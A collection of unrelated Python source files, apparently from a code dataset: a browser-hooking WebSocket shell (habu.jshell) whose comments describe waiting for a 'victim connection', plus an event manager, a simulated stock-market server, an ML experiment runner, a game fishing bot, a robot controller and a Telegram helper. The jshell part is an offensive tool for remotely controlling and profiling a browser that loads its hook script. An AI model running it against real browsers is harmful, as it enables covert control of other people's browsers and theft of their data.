self.active = s
break
if not command.startswith('_'):
await self.send(command)
return True
if ' ' in command:
arg = command.split(' ')[1]
command = command.split(' ')[0]
else:
arg = None
if command in self.internal_commands.keys():
if arg:
try:
self.internal_commands[command][1](arg)
except Exception as e:
print(e)
else:
try:
self.internal_commands[command][1]()
except Exception as e:
print(e)
elif command in self.external_commands.keys():
await self.send(self.external_commands[command][1])
else:
print('>>> Invalid command')
return True
runner = Runner()
queue = Queue()
async def sender_handler(websocket):
runner.addifnew(websocket)
while True:
if queue.empty():
await asyncio.sleep(1)
continue
command = queue.get()
try:
await runner.run(command)
except websockets.exceptions.ConnectionClosed:
print('>>> Connection lost.')
async def consumer(websocket, message):
if message.startswith('@##@'):
message = message.replace('@##@', '').strip()
outfile = Path('session-{}-{}.txt'.format(websocket.remote_address[0], websocket.remote_address[1]))
if not outfile.is_file():
header = '{} - {}:{} - {}\n'.format(
datetime.now(),
websocket.remote_address[0],
websocket.remote_address[1],
websocket.request_headers.get('User-Agent', 'No-User-Agent')
)
message = header + message
with outfile.open('a') as of:
of.write(message)
else:
try:
j = json.loads(message)
print(json.dumps(j, indent=4))
except ValueError:
print(message)
async def receiver_handler(websocket):
runner.addifnew(websocket)
# The commented only works with python3-websockets 4.x
'''
async for message in websocket:
await consumer(websocket, message)
'''
while True:
message = await websocket.recv()
await consumer(websocket, message)
async def handler(websocket, path):
sender_task = asyncio.ensure_future(sender_handler(websocket))
receiver_task = asyncio.ensure_future(receiver_handler(websocket))
done, pending = await asyncio.wait(
[sender_task, receiver_task],
return_when=asyncio.FIRST_COMPLETED,
)
@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
@click.option('-i', 'ip', default='127.0.0.1', help='IP to listen on')
@click.option('-p', 'port', default=3333, help='Port to listen on')
def cmd_jshell(ip, port, verbose):
"""Control a web browser through Websockets.
Bind a port (default: 3333) and listen for HTTP connections.
On connection, send a JavaScript code that opens a WebSocket that
can be used to send commands to the connected browser.
You can write the commands directly in the shell, or use plugins, that
are simply external JavaScript files.
Using habu.jshell you can completely control a web browser.
Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API
Example:
\b
$ habu.jshell
>> Listening on 192.168.0.10:3333. Waiting for a victim connection.
>> HTTP Request received from 192.168.0.15. Sending hookjs
>> Connection from 192.168.0.15
$ _sessions
0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
$ _info
{
"user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
"location": "http://192.168.0.10:3333/",
"java-enabled": false,
"platform": "Linux x86_64",
"app-code-name": "Mozilla",
"app-name": "Netscape",
"app-version": "5.0 (X11)",
"cookie-enabled": true,
"language": "es-AR",
"online": true
}
$ document.location
http://192.168.0.10:3333/
"""
global hook_js
hook_js = hook_js.format(ip=ip, port=port)
print('>>> Listening on {}:{}. Waiting for a victim connection.'.format(ip, port))
eventloop = asyncio.get_event_loop()
eventloop.run_until_complete(websockets.serve(handler, ip, port, create_protocol=MyWebSocketServerProtocol))
thread = threading.Thread(target=eventloop.run_forever)
thread.start()
completer = WordCompleter(completer_list + list(runner.internal_commands) + list(runner.external_commands))
history = InMemoryHistory()
while True:
if not thread.is_alive():
break
cmd = prompt('$ ', patch_stdout=True, completer=completer, history=history, lexer=PygmentsLexer(JavascriptLexer))
if cmd:
if cmd == '_help':
runner.cmd_help()
elif runner.sessions:
queue.put_nowait(cmd)
else:
print('>>> No active session!')
if __name__ == '__main__':
cmd_jshell()
|
event_manage.py
|
# -*- coding: utf-8 -*-
from queue import Queue, Empty
from threading import Thread
class EventManager:
"""
This is an event manager .
"""
def __init__(self):
self.__eventQueue = Queue()
self.__active = False
self.__thread = Thread(target=self.__run)
# eg .
# self.__handlers = {
# 'type1':[methods1,methods2],
# 'type2': [methods3, methods4],
# }
self.__handlers = {}
def __run(self):
"""
Start engine .
"""
while self.__active:
try:
event = self.__eventQueue.get(block=True, timeout=1)
self.__event_process(event)
except Empty:
pass
def __event_process(self, event):
"""
Handling events .
"""
# Check if there is a handler for this event
if event.type_ in self.__handlers:
# If present, the events are passed to the handler in order
for handler in self.__handlers[event.type_]:
handler(event)
def start(self):
"""
Start event manager .
"""
self.__active = True
self.__thread.daemon = True
self.__thread.start()
def stop(self):
"""
Stop event manager .
"""
self.__active = False
self.__thread.join()
def add_event_handler(self, type_, handler):
"""
Binding events and listener handlers .
:param type_: a name of handler
:param handler: function
"""
# Attempt to get a list of handler functions corresponding
# to an event type, create it if none .
try:
handler_list = self.__handlers[type_]
except KeyError:
handler_list = []
self.__handlers[type_] = handler_list
# To register a handler that is not in the handler list for
# the event, register the event .
if handler not in handler_list:
handler_list.append(handler)
def remove_event_handler(self, type_, handler):
"""
Remove handler .
"""
try:
handler_list = self.__handlers[type_]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
del self.__handlers[type_]
except KeyError:
pass
def send_event(self, event):
"""
Send events and store events in the event queue .
"""
self.__eventQueue.put(event)
|
server.py
|
################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from itertools import zip
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True
SIM_LENGTH = timedelta(days=365 * 5)
MARKET_OPEN = datetime.today().replace(hour=0, minute=30, second=0)
# Market parms
# min / max / std
SPD = (2.0, 6.0, 0.1)
PX = (60.0, 150.0, 1)
FREQ = (12, 36, 50)
# Trades
OVERLAP = 4
################################################################################
#
# Test Data
def bwalk(min, max, std):
""" Generates a bounded random walk. """
rng = max - min
while True:
max += normalvariate(0, std)
yield abs((max % (rng * 2)) - rng) + min
def market(t0=MARKET_OPEN):
""" Generates a random series of market conditions,
(time, price, spread).
"""
for hours, px, spd in zip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
yield t0, px, spd
t0 += timedelta(hours=abs(hours))
def orders(hist):
""" Generates a random set of limit orders (time, side, price, size) from
a series of market conditions.
"""
for t, px, spd in hist:
stock = 'ABC' if random() > 0.5 else 'DEF'
side, d = ('sell', 2) if random() > 0.5 else ('buy', -2)
order = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
size = int(abs(normalvariate(0, 100)))
yield t, stock, side, order, size
################################################################################
#
# Order Book
def add_book(book, order, size, _age=10):
""" Add a new order and size to a book, and age the rest of the book. """
yield order, size, _age
for o, s, age in book:
if age > 0:
yield o, s, age - 1
def clear_order(order, size, book, op=operator.ge, _notional=0):
""" Try to clear a sized order against a book, returning a tuple of
(notional, new_book) if successful, and None if not. _notional is a
recursive accumulator and should not be provided by the caller.
"""
(top_order, top_size, age), tail = book[0], book[1:]
if op(order, top_order):
_notional += min(size, top_size) * top_order
sdiff = top_size - size
if sdiff > 0:
return _notional, list(add_book(tail, top_order, sdiff, age))
elif len(tail) > 0:
return clear_order(order, -sdiff, tail, op, _notional)
def clear_book(buy=None, sell=None):
""" Clears all crossed orders from a buy and sell book, returning the new
books uncrossed.
"""
while buy and sell:
order, size, _ = buy[0]
new_book = clear_order(order, size, sell)
if new_book:
sell = new_book[1]
buy = buy[1:]
else:
break
return buy, sell
def order_book(orders, book, stock_name):
""" Generates a series of order books from a series of orders. Order books
are mutable lists, and mutating them during generation will affect the
next turn!
"""
for t, stock, side, order, size in orders:
if stock_name == stock:
new = add_book(book.get(side, []), order, size)
book[side] = sorted(new, reverse=side == 'buy', key=lambda x: x[0])
bids, asks = clear_book(**book)
yield t, bids, asks
################################################################################
#
# Test Data Persistence
def generate_csv():
""" Generate a CSV of order history. """
with open('test.csv', 'wb') as f:
writer = csv.writer(f)
for t, stock, side, order, size in orders(market()):
if t > MARKET_OPEN + SIM_LENGTH:
break
writer.writerow([t, stock, side, order, size])
def read_csv():
""" Read a CSV or order history into a list. """
with open('test.csv', 'rb') as f:
for time, stock, side, order, size in csv.reader(f):
yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
""" Boilerplate class for a multithreaded HTTP Server, with working
shutdown.
"""
allow_reuse_address = True
def shutdown(self):
""" Override MRO to shutdown properly. """
self.socket.close()
HTTPServer.shutdown(self)
def route(path):
""" Decorator for a simple bottle-like web framework. Routes path to the
decorated method, with the rest of the path as an argument.
"""
def _route(f):
setattr(f, '__route__', path)
return f
return _route
def read_params(path):
""" Read query parameters into a dictionary if they are parseable,
otherwise returns None.
"""
query = path.split('?')
if len(query) > 1:
query = query[1].split('&')
return dict(map(lambda x: x.split('='), query))
def get(req_handler, routes):
""" Map a request to the appropriate route of a routes instance. """
for name, handler in routes.__class__.__dict__.iteritems():
if hasattr(handler, "__route__"):
if None != re.search(handler.__route__, req_handler.path):
req_handler.send_response(200)
req_handler.send_header('Content-Type', 'application/json')
req_handler.send_header('Access-Control-Allow-Origin', '*')
req_handler.end_headers()
params = read_params(req_handler.path)
data = json.dumps(handler(routes, params)) + '\n'
req_handler.wfile.write(data)
return
def run(routes, host='0.0.0.0', port=8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
def do_get(self):
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
print('HTTP server started on port 8085')
while True:
from time import sleep
sleep(1)
server.shutdown()
server.start()
server.waitForThread()
################################################################################
#
# App
ops = {
'buy': operator.le,
'sell': operator.ge,
}
class App(object):
""" The trading game server application. """
def __init__(self):
self._book_1 = dict()
self._book_2 = dict()
self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
self._rt_start = datetime.now()
self._sim_start, _, _ = self._data_1.next()
self.read_10_first_lines()
@property
def _current_book_1(self):
for t, bids, asks in self._data_1:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
@property
def _current_book_2(self):
for t, bids, asks in self._data_2:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
def read_10_first_lines(self):
for _ in xrange(10):
self._data_1.next()
self._data_2.next()
@route('/query')
def handle_query(self, x):
""" Takes no arguments, and yields the current top of the book; the
best bid and ask and their sizes
"""
try:
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
except Exception as e:
print("error getting stocks...reinitalizing app")
self.__init__()
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
t = t1 if t1 > t2 else t2
print('Query received @ t%s' % t)
return [{
'id': x and x.get('id', None),
'stock': 'ABC',
'timestamp': str(t),
'top_bid': bids1 and {
'price': bids1[0][0],
'size': bids1[0][1]
},
'top_ask': asks1 and {
'price': asks1[0][0],
'size': asks1[0][1]
}
},
dict(id=x and x.get('id', None), stock='DEF', timestamp=str(t), top_bid=bids2 and {
'price': bids2[0][0],
'size': bids2[0][1]
}, top_ask=asks2 and {
'price': asks2[0][0],
'size': asks2[0][1]
})]
################################################################################
#
# Main
if __name__ == '__main__':
if not os.path.isfile('test.csv'):
print("No data found, generating...")
generate_csv()
run(App())
|
manager.py
|
import argparse
import ast
import copy
import datetime
from enum import Enum
from mlworkflow import lazyproperty as cached_property
import multiprocessing
import itertools
import logging
import os
import time
import astunparse
from mlworkflow import SideRunner
from experimentator import DummyExperiment
from .utils import find, mkdir, NestablePool
from .callbacked_experiment import FailedTrainingError
# pylint: disable=logging-fstring-interpolation, logging-format-interpolation
def product_kwargs(**kwargs):
try:
kvs = [[(k, v) for v in kwargs[k]] for k in kwargs]
except BaseException as e:
raise SyntaxError(f"Error parsing: {kwargs}") from e
yield from [dict(kv) for kv in itertools.product(*kvs)]
def update_ast(tree, overwrite, allow_double_assignation=False, allow_tuple_assignation=False):
met_targets = []
for node in tree.body:
if not isinstance(node, ast.Assign):
continue
for target in node.targets:
if hasattr(target, "id"):
assert allow_tuple_assignation or isinstance(target, ast.Name), "Tuple assignation is not allowed in config files (e.g. `a,b=1,2`). Impossible to overwrite '{}' of type '{}'".format(target.id, type(target))
assert allow_double_assignation or target.id not in met_targets, "Double assignation is not allowed in config files. '{}' seems to be assigned twice.".format(target.id)
if target.id in overwrite:
node.value = ast.parse(repr(overwrite.pop(target.id))).body[0].value
met_targets.append(target.id)
# Add remaining keys
for key, value in overwrite.items():
tree.body.append(ast.Assign([ast.Name(id=key, ctx=ast.Store())], ast.Constant(value, kind=None)))
ast.fix_missing_locations(tree)
return overwrite
def parse_config_str(config_str):
config = {}
exec(config_str, None, config) # pylint: disable=exec-used
return config
def parse_config_file(config_filename):
with open(config_filename, "r") as f:
config = parse_config_str(f.read())
return config
def get_worker_id(*_):
time.sleep(.1)
return os.getpid()
def set_cuda_visible_device(index):
time.sleep(.1)
os.environ["CUDA_VISIBLE_DEVICES"] = os.environ["CUDA_VISIBLE_DEVICES"].split(',')[index]
def build_experiment(config_filename, **kwargs):
with open(find(config_filename)) as f:
tree = ast.parse(f.read())
update_ast(tree, dict({**kwargs, "filename": config_filename}), allow_double_assignation=True)
config_str = astunparse.unparse(tree)
config = parse_config_str(config_str)
return type("Exp", tuple(config["experiment_type"][::-1]), {})(config)
class JobStatus(Enum):
TODO = 0
BUSY = 1
FAIL = 2
DONE = 3
class Job():
def __init__(self, filename, config_tree, dummy=False, grid_sample=None):
self.filename = filename
self.dummy = dummy
self.config_tree = config_tree
self.grid_sample = grid_sample or {}
self.status = JobStatus.TODO
def update_ast(self, **kwargs):
return update_ast(self.config_tree, dict(kwargs)) # dict() makes a copy
@property
def config_str(self):
return astunparse.unparse(self.config_tree)
@cached_property
def config(self):
config = {}
exec(self.config_str, None, config) # pylint: disable=exec-used
return {**config, "grid_sample": self.grid_sample, "filename": self.filename}
@cached_property
def exp(self):
if self.dummy:
self.config["experiment_type"].append(DummyExperiment)
return type("Exp", tuple(self.config["experiment_type"][::-1]), {})(self.config)
def run(self, epochs, keep=True, worker_ids=None, **runtime_cfg):
project_name = runtime_cfg.get("project_name", os.path.splitext(os.path.basename(self.filename))[0])
experiment_id = datetime.datetime.now().strftime("%Y%m%d_%H%M%S.%f")
worker_index = worker_ids[get_worker_id()] if worker_ids else 0
# Update config tree with runtime config
unoverwritten = self.update_ast(**runtime_cfg, epochs=epochs)
if unoverwritten:
logging.warning("Un-overwritten runtime kwargs: {}".format(list(unoverwritten.keys())))
# Write config string to file
folder = os.path.join(os.getenv("RESULTS_FOLDER", "."), project_name, experiment_id)
mkdir(folder)
filename = os.path.join(folder, "config.py")
with open(filename, "w") as f:
f.write(self.config_str)
# Add run and project names
self.config.update(project_name=project_name, experiment_id=experiment_id, worker_index=worker_index, folder=folder, dummy=self.dummy)
# Launch training
try:
self.status = JobStatus.BUSY
self.exp.logger.info(f"{project_name}.{experiment_id} doing {self.grid_sample}")
self.exp.train(epochs=epochs)
except FailedTrainingError as e:
self.status = JobStatus.FAIL
self.exp.logger.warning(f"{project_name}.{experiment_id} failed with NaNs")
except BaseException as e:
self.status = JobStatus.FAIL
self.exp.logger.exception(f"{project_name}.{experiment_id} failed")
if isinstance(e, KeyboardInterrupt):
raise e
else:
self.status = JobStatus.DONE
self.exp.logger.info(f"{project_name}.{experiment_id} done")
if not keep:
del self.exp
class ExperimentManager():
side_runner = None
def __init__(self, filename, logfile=None, num_workers=0, dummy=False, **grid_search):
self.logger = logging.getLogger("experimentator")
if logfile:
handler = logging.FileHandler(logfile, mode="w")
handler.setFormatter(logging.Formatter("[worker#%(threadName)s] %(asctime)s [%(levelname)s]%(filename)s:%(lineno)d: %(message)s"))
handler.setLevel(logging.INFO if num_workers > 0 else logging.DEBUG)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO if num_workers > 0 else logging.DEBUG)
#threading.current_thread().name = "main"
if num_workers > 0:
self.side_runner = SideRunner(num_workers, impl=multiprocessing.Pool)#, impl=NestablePool)
if "CUDA_VISIBLE_DEVICES" in os.environ and len(os.environ["CUDA_VISIBLE_DEVICES"].split(",")) == num_workers and num_workers > 1:
self.side_runner.pool.map(set_cuda_visible_device, range(len(self.side_runner)))
with open(find(filename)) as f:
tree = ast.parse(f.read())
if not grid_search:
self.jobs = [Job(filename, config_tree=tree, dummy=dummy)]
else:
self.jobs = []
unoverwritten = {}
for grid_sample in product_kwargs(**grid_search):
job = Job(filename, config_tree=copy.deepcopy(tree), dummy=dummy, grid_sample=grid_sample)
unoverwritten.update(**job.update_ast(**grid_sample))
self.jobs.append(job)
if unoverwritten:
self.logger.warning("Un-overwritten kwargs: {}".format(list(unoverwritten.keys())))
@cached_property
def worker_ids(self):
if not self.side_runner:
return {get_worker_id():0}
seq = range(len(self.side_runner))
return dict(zip(self.side_runner.pool.map(get_worker_id, seq), seq))
def execute(self, epochs, **runtime_cfg):
self.logger.info(f"Runtime config: {runtime_cfg}")
for job in self.jobs:
if job.status == JobStatus.TODO:
if self.side_runner:
self.side_runner.run_async(Job.run, job, epochs=epochs, keep=False, worker_ids=self.worker_ids, **runtime_cfg)
else:
#p = multiprocessing.Process(target=job.run, args=(epochs, False), kwargs=runtime_cfg)
#p.start()
#p.join()
job.run(epochs=epochs, keep=False, **runtime_cfg) # pylint: disable=expression-not-assigned
if self.side_runner:
self.side_runner.collect_runs()
def main():
parser = argparse.ArgumentParser(description="Experimentation library", prog="experimentator")
parser.add_argument("filename")
parser.add_argument("--epochs", type=int)
parser.add_argument('--logfile', type=str, default=None)# type=argparse.FileType('w', encoding='UTF-8')
parser.add_argument("--workers", type=int, default=0)
parser.add_argument('--grid', nargs="*")
parser.add_argument('--kwargs', nargs="*", action='append')
parser.add_argument('--dummy', default=False, action='store_true')
args = parser.parse_args()
# TODO: to be protected inside the if __name__ == '__main__' clause of the main module.
#multiprocessing.set_start_method("spawn")
grid = {}
for arg in args.grid or []:
exec(arg, None, grid) # pylint: disable=exec-used
kwargs = {}
for kwarg in [kwarg for kwargs in args.kwargs or [[]] for kwarg in kwargs]: # Flattened appended kwargs
exec(kwarg, None, kwargs) # pylint: disable=exec-used
num_subprocesses = 0 if args.workers <= 1 else args.workers
manager = ExperimentManager(args.filename, logfile=args.logfile, num_workers=num_subprocesses, dummy=args.dummy, **grid)
manager.execute(args.epochs, **kwargs)
# def dump(self, filename="joblist.index"):
# # Write index
# #index_filename = os.path.join(self.folder, os.path.splitext(self.basename)[0] + self.datetime_suffix + ".index")
# with open(filename, "a+") as f:
# for job in self.jobs:
# f.write("[{}]\t{}\t{}\n".format(job.status, job.filename, str(job.grid_sample)))
# print(f"job list successfully written to {filename}")
# @classmethod
# def load(cls, filename="joblist.index"):
# worker_id = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
# # Get job
# line = find_and_replace_wrapper(filename,
# lambda l: l.startswith("[TODO]"),
# lambda l: l.replace("[TODO]","[BUSY]").replace("\n","\t{}\n".format(worker_id))
# )
# if not line:
# print("nothing to do")
# return
# # Launch job
# try:
# _, filename, grid_sample = line.replace("\n","").split("\t")
# grid_sample = ast.literal_eval(grid_sample)
# run_job(filename, grid_sample=grid_sample, worker_id=worker_id, **kwargs)
# except:
# # Notify failure
# find_and_replace_wrapper(index_filename,
# lambda l: l.startswith("[BUSY]") and l.endswith(worker_id+"\n"),
# lambda l: l.replace("[BUSY]","[TODO]").replace("\t"+worker_id,"")
# )
# raise
# else:
# # Finish job
# line = find_and_replace_wrapper(index_filename,
# lambda l: l.startswith("[BUSY]") and l.endswith(worker_id+"\n"),
# lambda l: l.replace("[BUSY]","[DONE]")
# )
# def find_and_replace_wrapper(filename, search_expr, action_expr):
# with fileinput.FileInput(filename, inplace=True, backup='.bak') as file:
# output = None
# for line in file:
# if search_expr(line):
# print(action_expr(line), end="")
# output = line
# else:
# print(line, end="")
# return output
|
engine.py
|
import logging
import math
import time
import traceback
from threading import Thread
import cv2
from pynput import keyboard, mouse
from fishy.constants import fishyqr, lam2, libgps
from fishy.engine import SemiFisherEngine
from fishy.engine.common.IEngine import IEngine
from fishy.engine.common.window import WindowClient
from fishy.engine.fullautofisher.mode.calibrator import Calibrator
from fishy.engine.fullautofisher.mode.imode import FullAutoMode
from fishy.engine.fullautofisher.mode.player import Player
from fishy.engine.fullautofisher.mode.recorder import Recorder
from fishy.engine.common.qr_detection import (get_qr_location,
get_values_from_image, image_pre_process)
from fishy.engine.semifisher import fishing_event, fishing_mode
from fishy.engine.semifisher.fishing_mode import FishingMode
from fishy.helper import helper, hotkey
from fishy.helper.config import config
from fishy.helper.helper import log_raise, wait_until, is_eso_active
from fishy.helper.helper import sign
mse = mouse.Controller()
kb = keyboard.Controller()
class FullAuto(IEngine):
rotate_by = 30
def __init__(self, gui_ref):
from fishy.engine.fullautofisher.test import Test
super().__init__(gui_ref)
self._curr_rotate_y = 0
self.fisher = SemiFisherEngine(None)
self.calibrator = Calibrator(self)
self.test = Test(self)
self.show_crop = False
self.mode = None
def run(self):
self.gui.bot_started(True)
self.window = WindowClient(color=cv2.COLOR_RGB2GRAY, show_name="Full auto debug")
self.mode = None
if config.get("calibrate", False):
self.mode = Calibrator(self)
elif FullAutoMode(config.get("full_auto_mode", 0)) == FullAutoMode.Player:
self.mode = Player(self)
elif FullAutoMode(config.get("full_auto_mode", 0)) == FullAutoMode.Recorder:
self.mode = Recorder(self)
if not is_eso_active():
logging.info("Waiting for eso window to be active...")
wait_until(lambda: is_eso_active() or not self.start)
if self.start:
logging.info("starting in 2 secs...")
time.sleep(2)
# noinspection PyBroadException
try:
if self.window.get_capture() is None:
log_raise("Game window not found")
self.window.crop = get_qr_location(self.window.get_capture())
if self.window.crop is None:
log_raise("FishyQR not found, try to drag it around and try again")
if not (type(self.mode) is Calibrator) and not self.calibrator.all_calibrated():
log_raise("you need to calibrate first")
self.fisher.toggle_start()
fishing_event.unsubscribe()
if self.show_crop:
self.start_show()
if config.get("tabout_stop", 1):
self.stop_on_inactive()
self.mode.run()
except Exception:
traceback.print_exc()
self.start = False
self.gui.bot_started(False)
self.window.show(False)
logging.info("Quitting")
self.window.destory()
self.fisher.toggle_start()
def start_show(self):
def func():
while self.start and WindowClient.running():
self.window.show(self.show_crop, func=image_pre_process)
Thread(target=func).start()
def stop_on_inactive(self):
def func():
wait_until(lambda: not is_eso_active())
self.start = False
Thread(target=func).start()
def get_coords(self):
"""
There is chance that this function give None instead of a QR.
Need to handle manually
todo find a better way of handling None: switch from start bool to state which knows
todo its waiting for qr which doesn't block the engine when commanded to close
"""
img = self.window.processed_image(func=image_pre_process)
return get_values_from_image(img)[:3]
def move_to(self, target) -> bool:
current = self.get_coords()
if not current:
return False
print(f"Moving from {(current[0], current[1])} to {target}")
move_vec = target[0] - current[0], target[1] - current[1]
dist = math.sqrt(move_vec[0] ** 2 + move_vec[1] ** 2)
print(f"distance: {dist}")
if dist < 5e-05:
print("distance very small skipping")
return True
target_angle = math.degrees(math.atan2(-move_vec[1], move_vec[0])) + 90
from_angle = current[2]
if not self.rotate_to(target_angle, from_angle):
return False
walking_time = dist / self.calibrator.move_factor
print(f"walking for {walking_time}")
kb.press('w')
time.sleep(walking_time)
kb.release('w')
print("done")
return True
def rotate_to(self, target_angle, from_angle=None) -> bool:
if from_angle is None:
coords = self.get_coords()
if not coords:
return False
_, _, from_angle = coords
if target_angle < 0:
target_angle = 360 + target_angle
while target_angle > 360:
target_angle -= 360
print(f"Rotating from {from_angle} to {target_angle}")
angle_diff = target_angle - from_angle
if abs(angle_diff) > 180:
angle_diff = (360 - abs(angle_diff)) * sign(angle_diff) * -1
rotate_times = int(angle_diff / self.calibrator.rot_factor) * -1
print(f"rotate_times: {rotate_times}")
for _ in range(abs(rotate_times)):
mse.move(sign(rotate_times) * FullAuto.rotate_by * -1, 0)
time.sleep(0.05)
return True
def look_for_hole(self) -> bool:
valid_states = [fishing_mode.State.LOOKING, fishing_mode.State.FISHING]
_hole_found_flag = FishingMode.CurrentMode in valid_states
if not config.get("look_for_hole", 1):
return _hole_found_flag
t = 0
while not _hole_found_flag and t <= 2.5:
direction = -1 if t > 1.25 else 1
mse.move(0, FullAuto.rotate_by*direction)
time.sleep(0.05)
t += 0.05
_hole_found_flag = FishingMode.CurrentMode in valid_states
self._curr_rotate_y = t
return _hole_found_flag
def rotate_back(self):
while self._curr_rotate_y > 0.01:
mse.move(0, -FullAuto.rotate_by)
time.sleep(0.05)
self._curr_rotate_y -= 0.05
def toggle_start(self):
self.start = not self.start
if self.start:
self.thread = Thread(target=self.run)
self.thread.start()
if __name__ == '__main__':
logging.getLogger("").setLevel(logging.DEBUG)
hotkey.initalize()
# noinspection PyTypeChecker
bot = FullAuto(None)
bot.toggle_start()
|
pithon.py
|
from threading import Thread
from lib.alphabot import AlphaBot2
from lib.buzzer import beep_on, beep_off
from lib.led import led
from lib.ultrasonic import distance
from lib.infrared import get_key
from util.state import State
class Pithon:
def __init__(self):
# drive
self.drive = AlphaBot2()
# state
self.state = State.set_param
# pwm
self.PWM = 50
# buzzer
self.beep = False
def exec(self, key):
if self.state == State.set_param:
return
if key == 0:
if self.state == State.auto_run:
dis = distance()
print(dis)
if dis <= 20:
self.drive.right()
else:
self.drive.forward()
return
# manual
# 前进 后退 左转 右转 停止 加速 减速
last = self.state
self.state = State.manual
if key == 0x18:
self.drive.forward()
elif key == 0x08:
self.drive.left()
elif key == 0x1c:
self.drive.stop()
elif key == 0x5a:
self.drive.right()
elif key == 0x52:
self.drive.backward()
elif key == 0x15:
# speed up
if self.PWM + 10 < 101:
self.PWM += 10
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
print(self.PWM)
elif key == 0x07:
# slow down
if self.PWM - 10 > -1:
self.PWM = self.PWM - 10
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
print(self.PWM)
else:
self.state = last
def listen(self):
key = get_key()
if key is None:
self.exec(0)
return 0
print("key num: " + str(key))
if key == 70:
return 1
if self.state == State.set_param:
if key == 69:
led()
pass
if key == 71:
if self.beep is False:
beep_on()
self.beep = True
else:
beep_off()
self.beep = False
if key == 67:
self.state = State.auto_run
self.PWM = 15
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
elif self.state == State.auto_run:
if key == 67:
self.state = State.set_param
self.drive.stop()
else:
self.state = State.manual
self.exec(key)
else:
print("manual")
if key == 67:
self.state = State.set_param
self.drive.stop()
else:
self.exec(key)
return 0
def listen_wrapper(self):
while self.listen() != 1:
# print(self.state)
pass
def start(self):
t = Thread(target=self.listen_wrapper)
t.start()
t.join()
|
speed_pc.py
|
import mbhandler
import getch
import threading
import queue
key = queue.Queue()
RUNNING = True
def keypress():
global RUNNING
while RUNNING:
try:
k = getch.getch()
try:
key.put(k)
except key.Full:
pass
except KeyboardInterrupt:
RUNNING = False
except EOFError:
RUNNING = False
keyThread = threading.Thread(target=keypress)
keyThread.daemon = True
keyThread.start()
mbhandler.init(output="raw")
listening = False
spin = ["|","/","-","\\"]
spinIndex = 0
print("Press <ENTER> to start")
try:
while RUNNING:
if not key.empty():
k = key.get()
if k == "\n":
listening = True
else:
if listening:
print("\rWaiting: " + spin[spinIndex], end='')
spinIndex += 1
spinIndex %= 4
if not mbhandler.queue.empty():
msg = mbhandler.queue.get()
if listening:
print("\n" + msg + " pressed first")
print("Press <ENTER> to start")
listening = False
except KeyboardInterrupt:
pass
|
static.py
|
import sqlite3
import zipfile
import datetime
import telegram
import pandas as pd
from threading import Thread
from utility.setting import db_stg, openapi_path
try:
connn = sqlite3.connect(db_stg)
df_tg = pd.read_sql('SELECT * FROM telegram', connn)
connn.close()
except pd.io.sql.DatabaseError:
bot = ''
user_id = 0
else:
bot = df_tg['str_bot'][0]
user_id = int(df_tg['int_id'][0])
def telegram_msg(text):
if bot == '':
print('텔레그램 봇이 설정되지 않아 메세지를 보낼 수 없습니다.')
else:
try:
telegram.Bot(bot).sendMessage(chat_id=user_id, text=text)
except Exception as e:
print(f'텔레그램 설정 오류 알림 - telegram_msg {e}')
def thread_decorator(func):
def wrapper(*args):
Thread(target=func, args=args, daemon=True).start()
return wrapper
def now():
return datetime.datetime.now()
def timedelta_sec(second, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(seconds=second)
else:
next_time = std_time + datetime.timedelta(seconds=second)
return next_time
def timedelta_day(day, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(days=day)
else:
next_time = std_time + datetime.timedelta(days=day)
return next_time
def strp_time(timetype, str_time):
return datetime.datetime.strptime(str_time, timetype)
def strf_time(timetype, std_time=None):
